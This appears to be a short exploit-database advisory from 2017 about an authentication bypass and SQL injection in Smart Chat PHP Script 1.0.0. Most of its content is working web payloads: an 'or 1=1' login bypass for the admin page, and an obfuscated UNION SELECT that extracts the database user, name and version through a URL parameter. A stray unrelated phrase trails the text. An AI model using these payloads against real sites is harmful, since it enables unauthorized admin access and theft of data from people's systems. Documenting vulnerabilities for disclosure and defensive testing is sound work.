# # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
体验盒子
